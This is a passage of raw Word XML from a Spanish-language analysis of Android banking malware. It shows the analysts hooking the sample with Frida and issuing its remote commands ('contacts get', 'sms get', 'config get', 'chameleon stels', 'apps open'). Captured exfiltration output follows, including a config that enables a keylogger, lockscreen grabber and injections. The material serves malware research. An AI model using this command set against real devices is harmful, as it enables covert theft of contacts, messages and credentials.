          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">la primera instrumentación, Frida comienza a funcionar, y el resto de </w:t>
      </w:r>
      <w:r w:rsidR="00DC7934" w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>las operaciones</w:t>
      </w:r>
      <w:r w:rsidR="00E16DC0" w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> se pueden realizar directamente aplicando el código de los ficheros en la interfaz de comandos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D68CBF" w14:textId="4A45E051" w:rsidR="00357F26" w:rsidRPr="00152E39" w:rsidRDefault="00357F26" w:rsidP="00A059C1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Con la finalidad de comprobar que el sistema funciona correctamente, probamos un comando de exfiltración encontrado en la fase de análisis estático que sirve para obtener información de contactos del dispositivo. Creamos un contacto y procedemos a instrumentar con los comandos “</w:t>
      </w:r>
      <w:r w:rsidRPr="000B5914">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>contacts get</w:t>
      </w:r>
      <w:r w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>” como respuesta a la petición del malware a</w:t>
      </w:r>
      <w:r w:rsidR="000B5914">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la ruta </w:t>
      </w:r>
      <w:r w:rsidRPr="000B5914">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>/tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la API. </w:t>
      </w:r>
      <w:r w:rsidR="009305AC" w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Una vez finalizado el proceso, observamos la información directamente en la línea de comandos del host:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356A3D5D" w14:textId="77777777" w:rsidR="00675CDD" w:rsidRDefault="00675CDD" w:rsidP="009305A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p>
    <w:p w14:paraId="5A460409" w14:textId="5B931A71" w:rsidR="009305AC" w:rsidRPr="009305AC" w:rsidRDefault="009305A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r w:rsidRPr="009305AC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[*] Hooking of sendMapDataToServerAndManageResponse()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CB27E0" w14:textId="1D8D8786" w:rsidR="00EF311D" w:rsidRPr="0021244C" w:rsidRDefault="009305AC" w:rsidP="0021244C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009305AC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[*] Data sent to server: {data=[{"name":"Test contact #1","contact_id":"1","number":"1 (234) 567-89"}], callback=contacts:new, store=true, type=contacts}</w:t>
      </w:r>
      <w:r w:rsidR="00720EF7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="783A746C" w14:textId="041B33F8" w:rsidR="00F02F71" w:rsidRDefault="00EF311D" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">Tratamos de realizar la misma operación con Wireshark capturando paquetes </w:t>
      </w:r>
      <w:r w:rsidR="001B5A6B">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">al mismo tiempo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
        <w:t>en la interfaz loopback</w:t>
      </w:r>
      <w:r w:rsidR="001B5A6B">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">, al tratarse de comunicaciones reducidas a la interfaz local del, con el objetivo de </w:t>
      </w:r>
      <w:r w:rsidR="00F02F71">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ver cómo se envían los datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FC8FE4" w14:textId="448332A3" w:rsidR="00720EF7" w:rsidRDefault="00720EF7" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00720EF7">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
        <w:t>mprobamos que ha funcionado y podemos controlar el funcionamiento del malware, además de observar los datos que envía a los servidores remotos.</w:t>
      </w:r>
      <w:r w:rsidR="0058128E">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> Seguimos probando algunas de las funcionalidades descubiertas en la fase estática para cerciorarnos de que funcionan como se espera:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE6D9AD" w14:textId="77777777" w:rsidR="008D1D36" w:rsidRDefault="008D1D36" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65C1E9F5" w14:textId="23CCC806" w:rsidR="0058128E" w:rsidRDefault="002B5F97" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando: </w:t>
      </w:r>
      <w:r w:rsidR="005B5A7B" w:rsidRPr="005B5A7B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
        </w:rPr>
        <w:t>sms get</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4289C820" w14:textId="20C2AF67" w:rsidR="005B5A7B" w:rsidRPr="005B5A7B" w:rsidRDefault="002B5F97"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r w:rsidRPr="005B5A7B">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Respuesta enviada al servidor</w:t>
      </w:r>
      <w:r w:rsidR="005B5A7B">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B5A7B" w:rsidRPr="00541750">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>remoto</w:t>
      </w:r>
      <w:r w:rsidRPr="005B5A7B">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="005B5A7B" w:rsidRPr="005B5A7B">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B5A7B" w:rsidRPr="005B5A7B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>{data=[{"address":"1 (234) 567-89","body":"This is a test message\n","_id":"1","date":"1719891065859","name":"Test contact #1","thread_id":"1","type":"2"}], callback=sms:list, store=true, type=sms}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AACB3EB" w14:textId="3ACF4419" w:rsidR="002B5F97" w:rsidRDefault="002B5F97" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="794BDCE4" w14:textId="748359A7" w:rsidR="00100050" w:rsidRPr="00100050" w:rsidRDefault="00100050" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00100050">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando: </w:t>
      </w:r>
      <w:r w:rsidR="008D1D36">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>config get</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6618E7" w14:textId="76AA17EA" w:rsidR="00100050" w:rsidRPr="008D1D36" w:rsidRDefault="00100050"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r w:rsidRPr="005B5A7B">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Respuesta enviada al servidor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00541750">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>remoto</w:t>
      </w:r>
      <w:r w:rsidRPr="005B5A7B">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="008D1D36">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidR="008D1D36" w:rsidRPr="008D1D36">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>data=[{"auto_click":true},{"play_protect":-1},{"annoy":true},{"subtext":""},{"accessibility":"Xk011b72bcbf5396b4f9ec9737b706f44.Xkfb2bcfa7ae858b5247a4fc3c5ae3020.Xk557c1cde843eba60e10ab0f17fbfb64.Xk20ea96e7b9cc2c70537400df52bc4f1@4a8aef"},{"self_defense_shutdown":true},{"inejction_type":"a11y"},{"auto_delete":false},{"title":"Google Play"},{"push_write":false},{"lockscreen_grabber":true},{"launch_time":1719888101},{"intercept_cookies":false},{"text":"Play protect is working"},{"self_defense":"true"},{"self_notification_hide":false},{"w</w:t>
      </w:r>
      <w:r w:rsidR="008D1D36" w:rsidRPr="008D1D36">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ork_type":1},{"is":false},{"connect_server_a11y_granted":false},{"is_keylogger":true},{"interrupt_biometric":true},{"service_cham":false},{"interval":2000},{"hide_after_delay":true},{"injection":true},{"is_chameleon":false}], callback=config:get, store=true, type=log}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39331F7D" w14:textId="77777777" w:rsidR="00100050" w:rsidRPr="00100050" w:rsidRDefault="00100050" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB05471" w14:textId="24D5FE7B" w:rsidR="00416BFF" w:rsidRPr="00100050" w:rsidRDefault="00416BFF" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00100050">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chameleon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8BFECF" w14:textId="10E49970" w:rsidR="00416BFF" w:rsidRDefault="00416BF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r w:rsidRPr="005B5A7B">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Respuesta enviada al servidor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00541750">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>remoto</w:t>
      </w:r>
      <w:r w:rsidRPr="005B5A7B">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00416BFF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>{data={"command":"chameleon","result":"Full hide icon enabled","type":"0"}, store=false, type=log}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6919228E" w14:textId="77777777" w:rsidR="00C85E4E" w:rsidRPr="00100050" w:rsidRDefault="00C85E4E" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="044F7E34" w14:textId="36C7907E" w:rsidR="00C85E4E" w:rsidRPr="00C40F66" w:rsidRDefault="00C85E4E" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C40F66">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C40F66">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>apps</w:t>
      </w:r>
      <w:r w:rsidRPr="00C40F66">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C40F66">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1849FA6F" w14:textId="70923F24" w:rsidR="00C85E4E" w:rsidRPr="00BB1669"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C40F66">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Respuesta enviada al servidor</w:t>
      </w:r>
      <w:r w:rsidRPr="00C40F66">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C40F66">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">remoto: </w:t>
      </w:r>
      <w:r w:rsidR="00541750" w:rsidRPr="00C40F66">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>{"name":"Calendar","package":"com.android.calendar","version":"11","isSystem":true,"icon":"\/9j\/4AAQSkZJRgABAQAAAQABAAD</w:t>
      </w:r>
      <w:r w:rsidR="00C40F66">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00461604" w:rsidRPr="00C40F66">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">[…] </w:t>
      </w:r>
      <w:r w:rsidR="00461604" w:rsidRPr="007D3E6C">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El resto de datos han sido omitidos debido a la longitud, se trata de un listado complete de todas las aplicaciones presentes en el dispositivo infectado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB5E80E" w14:textId="436403A4" w:rsidR="007535EA" w:rsidRPr="00BB1669"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990265C" w14:textId="77777777" w:rsidR="00461604" w:rsidRPr="00BB1669" w:rsidRDefault="00461604" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="347C8F20" w14:textId="6C9A6135" w:rsidR="007535EA" w:rsidRPr="00100050" w:rsidRDefault="007535EA" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00100050">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">apps </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>open com.android.dialer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298B8044" w14:textId="67372543" w:rsidR="007535EA" w:rsidRDefault="007535EA"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5B5A7B">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Respuesta enviada al servidor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00541750">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>remoto</w:t>
      </w:r>
      <w:r w:rsidRPr="005B5A7B">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00461604">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>{data={"command":"apps","result":"Package com.android.dialer opened","type":"1"}, store=true, type=log}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366B8F6E" w14:textId="77777777" w:rsidR="00461604"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n-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26EE9B7E" w14:textId="3ED93C95" w:rsidR="00461604" w:rsidRDefault="00461604"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BB1669">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Res</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB1669">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ultado adicional obtenido: apertura de la aplicación de teléfono en el dispositivo infectado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B67ABD" w14:textId="77777777" w:rsidR="00FE27AD"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p>
    <w:p w14:paraId="1827E093" w14:textId="77777777" w:rsidR="00FE27AD" w:rsidRPr="00BB1669" w:rsidRDefault="00FE27AD" w:rsidP="0021244C">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
